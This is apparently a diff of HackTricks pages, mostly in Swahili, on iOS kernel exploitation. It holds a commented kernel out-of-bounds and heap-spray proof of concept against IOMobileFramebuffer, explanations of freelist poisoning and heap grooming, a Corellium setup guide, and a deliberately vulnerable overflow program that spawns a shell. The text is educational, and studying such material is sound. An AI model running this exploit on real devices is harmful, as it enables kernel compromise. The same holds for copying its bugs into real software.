// 3) Prepare input scalars for the external method call.
// The vulnerable path uses a 32-bit scalar as an INDEX into an internal
// array of pointers WITHOUT bounds checking (OOB read / type confusion).
// We set it to a large value to force the out-of-bounds access.
uint64_t scalars[4] = { 0x0 };
scalars[0] = 0x41414141; // **Attacker-controlled index** → OOB pointer lookup
// 4) Prepare output buffers (the method returns a scalar, e.g. a surface ID).
uint64_t output_scalars[4] = { 0 };
uint32_t output_scalars_size = 1;
printf("call s_default_fb_surface\n");
// 5) Invoke external method #83.
// On vulnerable builds, this path ends up calling:
// IOMobileFramebufferUserClient::s_displayed_fb_surface(...)
// → IOMobileFramebufferLegacy::get_displayed_surface(...)
// which uses our index to read a pointer and then passes it as IOSurface*.
// If the pointer is bogus, IOSurface code will dereference it and the kernel
// will panic (DoS).
ret = IOConnectCallMethod(
shared_user_client_conn,
83, // **Selector 83**: vulnerable external method
scalars, 1, // input scalars (count = 1; the OOB index)
NULL, 0, // no input struct
output_scalars, &output_scalars_size, // optional outputs
NULL, NULL); // no output struct
// 6) Check the call result. On many vulnerable targets, you'll see either
// KERN_SUCCESS right before a panic (because the deref happens deeper),
// or an error if the call path rejects the request (e.g., entitlement/type).
if (ret != KERN_SUCCESS) {
printf("failed to call external method: 0x%x --> %s\n",
ret, mach_error_string(ret));
return;
}
printf("external method returned KERN_SUCCESS\n");
// 7) Clean up the user client connection handle.
IOServiceClose(shared_user_client_conn);
printf("success!\n");
}
```
## Arbitrary Read PoC Explained
1. **Opening the right user client**
- `get_appleclcd_uc()` hupata huduma ya **AppleCLCD** na inafungua **user client type 2**. AppleCLCD na IOMobileFramebuffer zinashiriki jedwali lile la external-methods; type 2 inaonyesha **selector 83**, njia yenye udhaifu. **Hii ni njia yako ya kuingia kwa mdudu.** E_POC/)
**Kwa nini 83 ina umuhimu:** njia iliyodecompiled ni:
- `IOMobileFramebufferUserClient::s_displayed_fb_surface(...)`\
`IOMobileFramebufferUserClient::get_displayed_surface(...)`\
`IOMobileFramebufferLegacy::get_displayed_surface(...)`\
Ndani ya simu ya mwisho, code **inatumia scalar yako ya 32-bit kama index ya array bila ukaguzi wa mipaka**, inachukua pointer kutoka **`this + 0xA58 + index*8`**, na **inaipitisha kama `IOSurface*`** kwa `IOSurfaceRoot::copyPortNameForSurfaceInTask(...)`. **Hiyo ndiyo OOB + type confusion.**
2. **The heap spray (why IOSurface shows up here)**
- `do_spray()` inatumia **`IOSurfaceRootUserClient`** ku **unda IOSurfaces nyingi** na **kupuliza small values** (`s_set_value` style). Hii inajaza heap ya kernel karibu na **pointers kwenda kwa vitu halali vya IOSurface**.
- **Lengo:** wakati selector 83 inasoma nje ya jedwali la halali, nafasi ya OOB ina uwezekano wa kuwa pointer kwenda kwa moja ya IOSurfaces zako (halali)---kwa hivyo dereference baadaye **haitasababisha crash** na **itafanikiwa**. IOSurface ni primitive ya classic ya kernel spray yenye nyaraka nyingi, na chapisho la Saar linaorodhesha wazi kabisa njia za **create / set_value / lookup** zilizotumika kwenye mtiririko huu wa exploit.
3. **The "offset/8" trick (what that index really is)**
- Katika `trigger_oob(offset)`, unaweka `scalars[0] = offset / 8`.
- **Kwa nini kugawanya kwa 8?** Kernel inafanya **`base + index*8`** kuhesabu ni nafasi gani ya ukubwa wa pointer kuisoma. Unachagua **"slot number N"**, si byte offset. **Nyaya ni eight bytes kwa slot** kwenye 64-bit.
- Anwani iliyohesabiwa ni **`this + 0xA58 + index*8`**. PoC inatumia constant kubwa (`0x1200000 + 0x1048`) kwa lengo la kwenda **mbali sana nje ya mipaka** katika eneo ulilo jaribu **kulijaza kwa msongamano na pointers za IOSurface**. **Ikiwa spray "inamshinda," slot unayokigonga itakuwa `IOSurface*` halali.**
4. **What selector 83 returns (this is the subtle part)**
- The call is:
`IOConnectCallMethod(appleclcd_uc, 83, scalars, 1, NULL, 0,
output_scalars, &output_scalars_size, NULL, NULL);`o
- Ndani, baada ya OOB pointer fetch, driver inaita\
**`IOSurfaceRoot::copyPortNameForSurfaceInTask(task, IOSurface*, out_u32*)`**.
- **Matokeo:** **`output_scalars[0]` ni Mach port name (u32 handle) katika task yako** kwa *chochote pointer ya object uliyoipa kupitia OOB*. **Si raw kernel address leak; ni userspace handle (send right).** Tabia hii hasa (kunakili *port name*) inaonekana katika decompilation ya Saar.
**Kwa nini hii ni muhimu:** ukiwa na **port name** kwa (inavyodhaniwa) IOSurface, sasa unaweza kutumia **IOSurfaceRoot methods** kama:
- **`s_lookup_surface_from_port` (method 34)** → geuza port kuwa **surface ID** ambayo unaweza kufanya kazi nayo kupitia wito mwingine wa IOSurface, na
- **`s_create_port_from_surface` (method 35)** kama unahitaji kinzani.\
Saar anaongelea njia hizi hasa kama hatua inayofuata. **PoC inaonyesha kuwa unaweza "kutengeneza" IOSurface handle halali kutoka kwenye slot ya OOB.** [Saaramar](https://saaramar.github.io/IOMobileFrameBuffer_LPE_POC/?utm_source=chatgpt.com)
This [PoC was taken from here](https://github.com/saaramar/IOMobileFrameBuffer_LPE_POC/blob/main/poc/exploit.c) and added some comments to explain the steps:
```c
#include "exploit.h"
// Open the AppleCLCD (aka IOMFB) user client so we can call external methods.
io_connect_t get_appleclcd_uc(void) {
kern_return_t ret;
io_connect_t shared_user_client_conn = MACH_PORT_NULL;
int type = 2; // **UserClient type**: variant that exposes selector 83 on affected builds. ⭐
// (AppleCLCD and IOMobileFramebuffer share the same external methods table.)
// Find the **AppleCLCD** service in the IORegistry.
io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault,
IOServiceMatching("AppleCLCD"));
if(service == MACH_PORT_NULL) {
printf("[-] failed to open service\n");
return MACH_PORT_NULL;
}
printf("[*] AppleCLCD service: 0x%x\n", service);
// Open a user client connection to AppleCLCD with the chosen **type**.
ret = IOServiceOpen(service, mach_task_self(), type, &shared_user_client_conn);
if(ret != KERN_SUCCESS) {
printf("[-] failed to open userclient: %s\n", mach_error_string(ret));
return MACH_PORT_NULL;
}
printf("[*] AppleCLCD userclient: 0x%x\n", shared_user_client_conn);
return shared_user_client_conn;
}
// Trigger the OOB index path of external method #83.
// The 'offset' you pass is in bytes; dividing by 8 converts it to the
// index of an 8-byte pointer slot in the internal table at (this + 0xA58).
uint64_t trigger_oob(uint64_t offset) {
kern_return_t ret;
// The method takes a single 32-bit scalar that it uses as an index.
uint64_t scalars[1] = { 0x0 };
scalars[0] = offset / 8; // **index = byteOffset / sizeof(void*)**. ⭐
// #83 returns one scalar. In this flow it will be the Mach port name
// (a u32 handle in our task), not a kernel pointer.
uint64_t output_scalars[1] = { 0 };
uint32_t output_scalars_size = 1;
io_connect_t appleclcd_uc = get_appleclcd_uc();
if (appleclcd_uc == MACH_PORT_NULL) {
return 0;
}
// Call external method 83. Internally:
// ptr = *(this + 0xA58 + index*8); // OOB pointer fetch
// IOSurfaceRoot::copyPortNameForSurfaceInTask(task, (IOSurface*)ptr, &out)
// which creates a send right for that object and writes its port name
// into output_scalars[0]. If ptr is junk → deref/panic (DoS).
ret = IOConnectCallMethod(appleclcd_uc, 83,
scalars, 1,
NULL, 0,
output_scalars, &output_scalars_size,
NULL, NULL);
if (ret != KERN_SUCCESS) {
printf("[-] external method 83 failed: %s\n", mach_error_string(ret));
return 0;
}
// This is the key: you get back a Mach port name (u32) to whatever
// object was at that OOB slot (ideally an IOSurface you sprayed).
printf("[*] external method 83 returned: 0x%llx\n", output_scalars[0]);
return output_scalars[0];
}
// Heap-shape with IOSurfaces so an OOB slot likely contains a pointer to a
// real IOSurface (easier & stabler than a fully fake object).
bool do_spray(void) {
char data[0x10];
memset(data, 0x41, sizeof(data)); // Tiny payload for value spraying.
// Get IOSurfaceRootUserClient (reachable from sandbox/WebContent).
io_connect_t iosurface_uc = get_iosurface_root_uc();
if (iosurface_uc == MACH_PORT_NULL) {
printf("[-] do_spray: failed to allocate new iosurface_uc\n");
return false;
}
// Create many IOSurfaces and use set_value / value spray helpers
// (Brandon Azad-style) to fan out allocations in kalloc. ⭐
int *surface_ids = (int*)malloc(SURFACES_COUNT * sizeof(int));
for (size_t i = 0; i < SURFACES_COUNT; ++i) {
surface_ids[i] = create_surface(iosurface_uc); // s_create_surface
if (surface_ids[i] <= 0) {
return false;
}
// Spray small values repeatedly: tends to allocate/fill predictable
// kalloc regions near where the IOMFB table OOB will read from.
// The “with_gc” flavor forces periodic GC to keep memory moving/packed.
if (IOSurface_spray_with_gc(iosurface_uc, surface_ids[i],
20, 200, // rounds, per-round items
data, sizeof(data),
NULL) == false) {
printf("iosurface spray failed\n");
return false;
}
}
return true;
}
int main(void) {
// Ensure we can talk to IOSurfaceRoot (some helpers depend on it).
io_connect_t iosurface_uc = get_iosurface_root_uc();
if (iosurface_uc == MACH_PORT_NULL) {
return 0;
}
printf("[*] do spray\n");
if (do_spray() == false) {
printf("[-] shape failed, abort\n");
return 1;
}
printf("[*] spray success\n");
// Trigger the OOB read. The magic constant chooses a pointer-slot
// far beyond the legit array (offset is in bytes; index = offset/8).
// If the spray worked, this returns a **Mach port name** (handle) to one
// of your sprayed IOSurfaces; otherwise it may crash.
printf("[*] trigger\n");
trigger_oob(0x1200000 + 0x1048);
return 0;
}
```
## Marejeo
- [Maandishi ya awali na Saar Amar](https://saaramar.github.io/IOMobileFrameBuffer_LPE_POC/)
- [Exploit PoC code](https://github.com/saaramar/IOMobileFrameBuffer_LPE_POC)
- [Utafiti kutoka kwa jsherman212](https://jsherman212.github.io/2021/11/28/popping_ios14_with_iomfb.html?utm_source=chatgpt.com)
{{#include ../../banners/hacktricks-training.md}}

271
src/binary-exploitation/ios-exploiting/README.md Normal file
View File

@ -0,0 +1,271 @@
# iOS Exploiting
{{#include ../../banners/hacktricks-training.md}}
## iOS Exploit Mitigations
- **Code Signing** in iOS inafanya kazi kwa kuhitaji kila kipande cha executable code (apps, libraries, extensions, etc.) kusainiwa kwa cheti kinachotolewa na Apple kwa njia ya cryptography. Wakati code inapopakiwa, iOS inathibitisha saini ya digital dhidi ya trusted root ya Apple. Ikiwa saini si halali, haipo, au imerekebishwa, OS inakataa kuiruhusu kuendesha. Hii inazuia attackers kuingiza malicious code ndani ya apps halali au kuendesha unsigned binaries, na kuzuia kwa ufanisi most exploit chains zinazotegemea kuendesha arbitrary au tampered code.
- **CoreTrust** ni subsystem ya iOS inayohusika na kutekeleza code signing wakati wa runtime. Inathibitisha saini moja kwa moja kwa kutumia root certificate ya Apple bila kutegemea cached trust stores, ikimaanisha binaries zilizotiwa saini na Apple (au zenye valid entitlements) zinaweza tu kuendesha. CoreTrust inahakikisha kwamba hata kama attacker atabadilisha app baada ya usakinishaji, kubadilisha system libraries, au kujaribu kupakia unsigned code, mfumo utakataa utekelezaji isipokuwa code bado imewekwa saini ipasavyo. Utekelezaji huu mkali unatoka njia nyingi za post-exploitation ambazo matoleo ya zamani ya iOS yaliyaruhusu kupitia ukaguzi dhaifu au unaoweza kupitishwa.
- **Data Execution Prevention (DEP)** inaweka memory regions kama non-executable isipokuwa zinaonekana wazi kuwa zina code. Hii inazuia attackers kuingiza shellcode ndani ya data regions (kama stack au heap) na kuirun, ikilazimisha kutumia mbinu ngumu zaidi kama ROP (Return-Oriented Programming).
- **ASLR (Address Space Layout Randomization)** inafanya randomize addresses za memory za code, libraries, stack, na heap kila mara mfumo unapowaka. Hii inafanya kuwa vigumu kwa attackers kutabiri wapi instructions au gadgets zitapatikana, na kuvunja exploit chains nyingi zinazotegemea layouts ya memory zilizo thabiti.
- **KASLR (Kernel ASLR)** inatumia wazo lile lile la randomization kwenye kernel ya iOS. Kwa kuchanganya base address ya kernel kila boot, inazuia attackers kupata kwa uhakika kernel functions au structures, na kuongeza ugumu wa kernel-level exploits ambazo vingemletea full system control.
- **Kernel Patch Protection (KPP)** pia inajulikana kama **AMCC (Apple Mobile File Integrity)** katika iOS, inafuatilia kupitia muda mrefu code pages za kernel kuhakikisha hazijabadilishwa. Ikiwa tampering itagunduliwa—kama exploit ikijaribu ku-patch kernel functions au kuingiza malicious code—kifaa kitabofya mara moja na kurestart. Ulinzi huu unafanya persistent kernel exploits kuwa ngumu zaidi, kwa sababu attackers hawawezi tu hook au patch kernel instructions bila kusababisha system crash.
- **Kernel Text Readonly Region (KTRR)** ni sifa ya usalama inayotegemea hardware iliyowekwa kwenye vifaa vya iOS. Inatumia memory controller ya CPU kuweka kernels code (text) section kama read-only kabisa baada ya boot. Mara imefungwa, hata kernel yenyewe haiwezi kubadilisha eneo hili la memory. Hii inazuia attackers—na hata code yenye privileji—kutengeneza patches za kernel instructions wakati wa runtime, ikifunga aina kubwa ya exploits zinazotegemea kubadilisha kernel code moja kwa moja.
- **Pointer Authentication Codes (PAC)** zinatumia saini za cryptographic zilizowekwa ndani ya bits zisizotumika za pointers kuthibitisha uadilifu wao kabla ya matumizi. Wakati pointer (kama return address au function pointer) inaundwa, CPU inaisaini kwa secret key; kabla ya dereferencing, CPU inakagua saini. Ikiwa pointer imeharibiwa, ukaguzi unashindwa na utekelezaji unasimama. Hii inazuia attackers kuunda au kutumia pointers zilizoharibiwa katika memory corruption exploits, na kufanya mbinu kama ROP au JOP kuwa ngumu zaidi kutekeleza kwa ufanisi.
- **Privilege Access never (PAN)** ni sifa ya hardware inayozuia kernel (privileged mode) kutoka kufikia moja kwa moja user-space memory isipokuwa iwashwe wazi kwa hiyo. Hii inazuia attackers waliopata kernel code execution kusoma au kuandika user memory kwa urahisi ili kufanya escalation ya exploits au kuiba data nyeti. Kwa kutekeleza mgawanyiko mkali, PAN inapunguza athari za kernel exploits na kuzuia mbinu nyingi za kawaida za privilege-escalation.
- **Page Protection Layer (PPL)** ni mechanism ya usalama ya iOS inayolinda maeneo muhimu ya memory yaliyosimamiwa na kernel, hasa yale yanayohusiana na code signing na entitlements. Inatekeleza ulinzi mkali wa kuandika kwa kutumia MMU (Memory Management Unit) na ukaguzi wa ziada, kuhakikisha kwamba hata code ya kernel yenye privileji haiwezi kubadilisha arbitrary pages nyeti. Hii inazuia attackers waliopata kernel-level execution kutoka kujaribu kuharibu structures muhimu za usalama, na kufanya persistence na code-signing bypasses kuwa ngumu sana.
## Old Kernel Heap (Pre-iOS 15 / Pre-A12 era)
Kernel ilikuwa ikitumia **zone allocator** (`kalloc`) iliyogawanywa katika "zones" za ukubwa uliowekwa.
Kila zone ilihifadhi allocations za class moja tu ya ukubwa.
From the screenshot:
| Zone Name | Element Size | Example Use |
|----------------------|--------------|-----------------------------------------------------------------------------|
| `default.kalloc.16` | 16 bytes | Very small kernel structs, pointers. |
| `default.kalloc.32` | 32 bytes | Small structs, object headers. |
| `default.kalloc.64` | 64 bytes | IPC messages, tiny kernel buffers. |
| `default.kalloc.128` | 128 bytes | Medium objects like parts of `OSObject`. |
| `default.kalloc.256` | 256 bytes | Larger IPC messages, arrays, device structures. |
| … | … | … |
| `default.kalloc.1280`| 1280 bytes | Large structures, IOSurface/graphics metadata. |
**How it worked:**
- Each allocation request inarundishwa (rounded up) hadi ukubwa wa zone karibu zaidi. (Mfano, ombi la 50-byte linaenda kwenye `kalloc.64` zone).
- Memory katika kila zone ilihifadhiwa kwenye freelist — chunks zilizofungwa (freed) na kernel zilirudi kwenye zone hiyo.
- Ikiwa ungeoverflow buffer ya 64-byte, ungeandika juu next object in the same zone.
This is why **heap spraying / feng shui** ilikuwa effective sana: unaweza kutabiri object neighbors kwa kupiga allocations za size class ileile.
### The freelist
Inside each kalloc zone, freed objects hawakurudishwa moja kwa moja kwa system — zilienda kwenye freelist, linked list ya chunks zinazopatikana.
- When a chunk was freed, the kernel aliandika pointer mwanzoni mwa chunk hiyo → address ya next free chunk katika zone ileile.
- The zone ilihifadhi HEAD pointer kwa chunk ya kwanza yenye free.
- Allocation ilitumia kila wakati HEAD ya sasa:
1. Pop HEAD (rejesha memory hiyo kwa caller).
2. Update HEAD = HEAD->next (hiyo ilihifadhiwa kwenye header ya freed chunk).
- Freeing ilirudisha chunks nyuma:
- `freed_chunk->next = HEAD`
- `HEAD = freed_chunk`
So freelist ilikuwa tu linked list iliyojengwa ndani ya freed memory yenyewe.
Normal state:
```
Zone page (64-byte chunks for example):
[ A ] [ F ] [ F ] [ A ] [ F ] [ A ] [ F ]
Freelist view:
HEAD ──► [ F ] ──► [ F ] ──► [ F ] ──► [ F ] ──► NULL
(next ptrs stored at start of freed chunks)
```
### Kutumia freelist
Kwa sababu first 8 bytes za free chunk = freelist pointer, mshambuliaji anaweza kuharibu hilo:
1. **Heap overflow** ndani ya freed chunk jirani → kuandika juu ya “next” pointer yake.
2. **Use-after-free** kuandika ndani ya object iliyofreed → kuandika juu ya “next” pointer yake.
Kisha, kwenye allocation inayofuata ya ukubwa huo:
- Allocator inatoa (pops) chunk iliyoharibika.
- Inafuata “next” pointer iliyowekwa na mshambuliaji.
- Inarudisha pointer kwa memory yoyote, ikiruhusu fake object primitives au targeted overwrite.
Mfano wa kuona wa freelist poisoning:
```
Before corruption:
HEAD ──► [ F1 ] ──► [ F2 ] ──► [ F3 ] ──► NULL
After attacker overwrite of F1->next:
HEAD ──► [ F1 ]
(next) ──► 0xDEAD_BEEF_CAFE_BABE (attacker-chosen)
Next alloc of this zone → kernel hands out memory at attacker-controlled address.
```
This freelist design made exploitation highly effective pre-hardening: predictable neighbors from heap sprays, raw pointer freelist links, and no type separation allowed attackers to escalate UAF/overflow bugs into arbitrary kernel memory control.
### Heap Grooming / Feng Shui
The goal of heap grooming is to **shape the heap layout** so that when an attacker triggers an overflow or use-after-free, the target (victim) object sits right next to an attacker-controlled object.\
That way, when memory corruption happens, the attacker can reliably overwrite the victim object with controlled data.
**Steps:**
1. Spray allocations (fill the holes)
- Over time, the kernel heap gets fragmented: some zones have holes where old
objects were freed.
- The attacker first makes lots of dummy allocations to fill these gaps, so
the heap becomes “packed” and predictable.
2. Force new pages
- Once the holes are filled, the next allocations must come from new pages
added to the zone.
- Fresh pages mean objects will be clustered together, not scattered across
old fragmented memory.
- This gives the attacker much better control of neighbors.
3. Place attacker objects
- The attacker now sprays again, creating lots of attacker-controlled objects
in those new pages.
- These objects are predictable in size and placement (since they all belong
to the same zone).
4. Free a controlled object (make a gap)
- The attacker deliberately frees one of their own objects.
- This creates a “hole” in the heap, which the allocator will later reuse for
the next allocation of that size.
5. Victim object lands in the hole
- The attacker triggers the kernel to allocate the victim object (the one
they want to corrupt).
- Since the hole is the first available slot in the freelist, the victim is
placed exactly where the attacker freed their object.
6. Overflow / UAF into victim
- Now the attacker has attacker-controlled objects around the victim.
- By overflowing from one of their own objects (or reusing a freed one), they
can reliably overwrite the victims memory fields with chosen values.
**Why it works**:
- Zone allocator predictability: allocations of the same size always come from
the same zone.
- Freelist behavior: new allocations reuse the most recently freed chunk first.
- Heap sprays: attacker fills memory with predictable content and controls layout.
- End result: attacker controls where the victim object lands and what data sits
next to it.
---
## Modern Kernel Heap (iOS 15+/A12+ SoCs)
Apple hardened the allocator and made **heap grooming much harder**:
### 1. From Classic kalloc to kalloc_type
- **Before**: a single `kalloc.<size>` zone existed for each size class (16, 32, 64, … 1280, etc.). Any object of that size was placed there → attacker objects could sit next to privileged kernel objects.
- **Now**:
- Kernel objects are allocated from **typed zones** (`kalloc_type`).
- Each type of object (e.g., `ipc_port_t`, `task_t`, `OSString`, `OSData`) has its own dedicated zone, even if theyre the same size.
- The mapping between object type ↔ zone is generated from the **kalloc_type system** at compile time.
An attacker can no longer guarantee that controlled data (`OSData`) ends up adjacent to sensitive kernel objects (`task_t`) of the same size.
### 2. Slabs and Per-CPU Caches
- The heap is divided into **slabs** (pages of memory carved into fixed-size chunks for that zone).
- Each zone has a **per-CPU cache** to reduce contention.
- Allocation path:
1. Try per-CPU cache.
2. If empty, pull from the global freelist.
3. If freelist is empty, allocate a new slab (one or more pages).
- **Benefit**: This decentralization makes heap sprays less deterministic, since allocations may be satisfied from different CPUs caches.
### 3. Randomization inside zones
- Within a zone, freed elements are not handed back in simple FIFO/LIFO order.
- Modern XNU uses **encoded freelist pointers** (safe-linking like Linux, introduced ~iOS 14).
- Each freelist pointer is **XOR-encoded** with a per-zone secret cookie.
- This prevents attackers from forging a fake freelist pointer if they gain a write primitive.
- Some allocations are **randomized in their placement within a slab**, so spraying doesnt guarantee adjacency.
### 4. Guarded Allocations
- Certain critical kernel objects (e.g., credentials, task structures) are allocated in **guarded zones**.
- These zones insert **guard pages** (unmapped memory) between slabs or use **redzones** around objects.
- Any overflow into the guard page triggers a fault → immediate panic instead of silent corruption.
### 5. Page Protection Layer (PPL) and SPTM
- Even if you control a freed object, you cant modify all of kernel memory:
- **PPL (Page Protection Layer)** enforces that certain regions (e.g., code signing data, entitlements) are **read-only** even to the kernel itself.
- On **A15/M2+ devices**, this role is replaced/enhanced by **SPTM (Secure Page Table Monitor)** + **TXM (Trusted Execution Monitor)**.
- These hardware-enforced layers mean attackers cant escalate from a single heap corruption to arbitrary patching of critical security structures.
### 6. Large Allocations
- Not all allocations go through `kalloc_type`.
- Very large requests (above ~16KB) bypass typed zones and are served directly from **kernel VM (kmem)** via page allocations.
- These are less predictable, but also less exploitable, since they dont share slabs with other objects.
### 7. Allocation Patterns Attackers Target
Even with these protections, attackers still look for:
- **Reference count objects**: if you can tamper with retain/release counters, you may cause use-after-free.
- **Objects with function pointers (vtables)**: corrupting one still yields control flow.
- **Shared memory objects (IOSurface, Mach ports)**: these are still attack targets because they bridge user ↔ kernel.
But — unlike before — you cant just spray `OSData` and expect it to neighbor a `task_t`. You need **type-specific bugs** or **info leaks** to succeed.
### Example: Allocation Flow in Modern Heap
Suppose userspace calls into IOKit to allocate an `OSData` object:
1. **Type lookup**`OSData` maps to `kalloc_type_osdata` zone (size 64 bytes).
2. Check per-CPU cache for free elements.
- If found → return one.
- If empty → go to global freelist.
- If freelist empty → allocate a new slab (page of 4KB → 64 chunks of 64 bytes).
3. Return chunk to caller.
**Freelist pointer protection**:
- Each freed chunk stores the address of the next free chunk, but encoded with a secret key.
- Overwriting that field with attacker data wont work unless you know the key.
## Comparison Table
| Feature | **Old Heap (Pre-iOS 15)** | **Modern Heap (iOS 15+ / A12+)** |
|---------------------------------|------------------------------------------------------------|--------------------------------------------------|
| Allocation granularity | Fixed size buckets (`kalloc.16`, `kalloc.32`, etc.) | Size + **type-based buckets** (`kalloc_type`) |
| Placement predictability | High (same-size objects side by side) | Low (same-type grouping + randomness) |
| Freelist management | Raw pointers in freed chunks (easy to corrupt) | **Encoded pointers** (safe-linking style) |
| Adjacent object control | Easy via sprays/frees (feng shui predictable) | Hard — typed zones separate attacker objects |
| Kernel data/code protections | Few hardware protections | **PPL / SPTM** protect page tables & code pages |
| Exploit reliability | High with heap sprays | Much lower, requires logic bugs or info leaks |
## (Old) Physical Use-After-Free via IOSurface
{{#ref}}
ios-physical-uaf-iosurface.md
{{#endref}}
---
## Ghidra Install BinDiff
Download BinDiff DMG from [https://www.zynamics.com/bindiff/manual](https://www.zynamics.com/bindiff/manual) and install it.
Open Ghidra with `ghidraRun` and go to `File` --> `Install Extensions`, press the add button and select the path `/Applications/BinDiff/Extra/Ghidra/BinExport` and click OK and isntall it even if there is a version mismatch.
### Using BinDiff with Kernel versions
1. Go to the page [https://ipsw.me/](https://ipsw.me/) and download the iOS versions you want to diff. These will be `.ipsw` files.
2. Decompress until you get the bin format of the kernelcache of both `.ipsw` files. You have information on how to do this on:
{{#ref}}
../../macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md
{{#endref}}
3. Open Ghidra with `ghidraRun`, create a new project and load the kernelcaches.
4. Open each kernelcache so they are automatically analyzed by Ghidra.
5. Then, on the project Window of Ghidra, right click each kernelcache, select `Export`, select format `Binary BinExport (v2) for BinDiff` and export them.
6. Open BinDiff, create a new workspace and add a new diff indicating as primary file the kernelcache that contains the vulnerability and as secondary file the patched kernelcache.
---
## Finding the right XNU version
If you want to check for vulnerabilities in a specific version of iOS, you can check which XNU release version the iOS version uses at [https://www.theiphonewiki.com/wiki/kernel]https://www.theiphonewiki.com/wiki/kernel).
For example, the versions `15.1 RC`, `15.1` and `15.1.1` use the version `Darwin Kernel Version 21.1.0: Wed Oct 13 19:14:48 PDT 2021; root:xnu-8019.43.1~1/RELEASE_ARM64_T8006`.
{{#include ../../banners/hacktricks-training.md}}

79
src/binary-exploitation/ios-exploiting/ios-corellium.md Normal file
View File

@ -0,0 +1,79 @@
# iOS Jinsi ya Kuunganisha na Corellium
{{#include ../../banners/hacktricks-training.md}}
## **Mahitaji**
- VM ya Corellium iOS (jailbroken au la). Katika mwongozo huu tunachukulia kuwa una ufikiaji wa Corellium.
- Zana za ndani: **ssh/scp**.
- (Hiari) **SSH keys** zilizoongezwa kwenye mradi wako wa Corellium kwa kuingia bila nenosiri.
## **Unganisha kwenye iPhone VM kutoka localhost**
### A) **Quick Connect (no VPN)**
0) Ongeza ssh key yako katika **`/admin/projects`** (inashauriwa).
1) Fungua ukurasa wa kifaa → **Connect**
2) **Copy the Quick Connect SSH command** inayotolewa na Corellium na ubandike kwenye terminal yako.
3) Ingiza nenosiri au tumia ssh key yako (inashauriwa).
### B) **VPN → direct SSH**
0) Ongeza ssh key yako katika **`/admin/projects`** (inashauriwa).
1) Device page → **CONNECT****VPN** → pakua `.ovpn` na uungane kwa mteja wowote wa VPN unaounga mkono TAP mode. (Angalia [https://support.corellium.com/features/connect/vpn](https://support.corellium.com/features/connect/vpn) ikiwa una matatizo.)
2) Fanya SSH kwenye anwani ya VM **10.11.x.x**:
```bash
ssh root@10.11.1.1
```
## **Pakia binary ya asili & uitekeleze**
### 2.1 **Pakia**
- Ikiwa Quick Connect ilikupa host/port:
```bash
scp -J <domain> ./mytool root@10.11.1.1:/var/root/mytool
```
- Ikiwa unatumia VPN (10.11.x.x):
```bash
scp ./mytool -J <domain> root@10.11.1.1:/var/root/mytool
```
## **Upload & install app ya iOS (.ipa)**
### Njia A — **Web UI (haraka zaidi)**
1) Device page → **Apps** tab → **Install App** → chagua `.ipa` yako.
2) Kutoka kwenye tab hiyo hiyo unaweza **launch/kill/uninstall**.
### Njia B — **Kwa script kupitia Corellium Agent**
1) Tumia API Agent ili **upload** kisha **install**:
```js
// Node.js (pseudo) using Corellium Agent
await agent.upload("./app.ipa", "/var/tmp/app.ipa");
await agent.install("/var/tmp/app.ipa", (progress, status) => {
console.log(progress, status);
});
```
### Njia C — **Non-jailbroken (proper signing / Sideloadly)**
- Ikiwa huna provisioning profile, tumia **Sideloadly** kusaini tena kwa Apple ID yako, au saini ndani ya Xcode.
- Unaweza pia kuonyesha VM kwa Xcode kwa kutumia **USBFlux** (ona §5).
- Kwa logi/maagizo ya haraka bila SSH, tumia kifaa **Console** katika UI.
## **Nyongeza**
- **Port-forwarding** (ifanya VM ihisi kama ya ndani kwa zana nyingine):
```bash
# Forward local 2222 -> device 22
ssh -N -L 2222:127.0.0.1:22 root@10.11.1.1
# Now you can: scp -P 2222 file root@10.11.1.1:/var/root/
```
- **LLDB remote debugging**: tumia anwani ya **LLDB/GDB stub** inayoonyeshwa chini ya ukurasa wa kifaa (CONNECT → LLDB).
- **USBFlux (macOS/Linux)**: wasilisha VM kwa **Xcode/Sideloadly** kama kifaa kilichounganishwa kwa kebo.
## **Makosa ya kawaida**
- **Proper signing** inahitajika kwenye **non-jailbroken** devices; unsigned IPAs hazitaanzishwa.
- **Quick Connect vs VPN**: Quick Connect ni rahisi zaidi; tumia **VPN** unapohitaji kifaa kwenye mtandao wa ndani (kwa mfano, local proxies/tools).
- **No App Store** kwenye Corellium devices; leta yako mwenyewe (re)signed IPAs.
{{#include ../../banners/hacktricks-training.md}}

205
src/binary-exploitation/ios-exploiting/ios-example-heap-exploit.md Normal file
View File

@ -0,0 +1,205 @@
# iOS Jinsi ya Kuunganisha na Corellium
{{#include ../../banners/hacktricks-training.md}}
## Vuln Code
```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
__attribute__((noinline))
static void safe_cb(void) {
puts("[*] safe_cb() called — nothing interesting here.");
}
__attribute__((noinline))
static void win(void) {
puts("[+] win() reached — spawning shell...");
fflush(stdout);
system("/bin/sh");
exit(0);
}
typedef void (*cb_t)(void);
typedef struct {
cb_t cb; // <--- Your target: overwrite this with win()
char tag[16]; // Cosmetic (helps make the chunk non-tiny)
} hook_t;
static void fatal(const char *msg) {
perror(msg);
exit(1);
}
int main(void) {
// Make I/O deterministic
setvbuf(stdout, NULL, _IONBF, 0);
// Print address leak so exploit doesn't guess ASLR
printf("[*] LEAK win() @ %p\n", (void*)&win);
// 1) Allocate the overflow buffer
size_t buf_sz = 128;
char *buf = (char*)malloc(buf_sz);
if (!buf) fatal("malloc buf");
memset(buf, 'A', buf_sz);
// 2) Allocate the hook object (likely adjacent in same magazine/size class)
hook_t *h = (hook_t*)malloc(sizeof(hook_t));
if (!h) fatal("malloc hook");
h->cb = safe_cb;
memcpy(h->tag, "HOOK-OBJ", 8);
// A tiny bit of noise to look realistic (and to consume small leftover holes)
void *spacers[16];
for (int i = 0; i < 16; i++) {
spacers[i] = malloc(64);
if (spacers[i]) memset(spacers[i], 0xCC, 64);
}
puts("[*] You control a write into the 128B buffer (no bounds check).");
puts("[*] Enter payload length (decimal), then the raw payload bytes.");
// 3) Read attacker-chosen length and then read that many bytes → overflow
char line[64];
if (!fgets(line, sizeof(line), stdin)) fatal("fgets");
unsigned long n = strtoul(line, NULL, 10);
// BUG: no clamp to 128
ssize_t got = read(STDIN_FILENO, buf, n);
if (got < 0) fatal("read");
printf("[*] Wrote %zd bytes into 128B buffer.\n", got);
// 4) Trigger: call the hook's callback
puts("[*] Calling h->cb() ...");
h->cb();
puts("[*] Done.");
return 0;
}
```
Compile kwa kutumia:
```bash
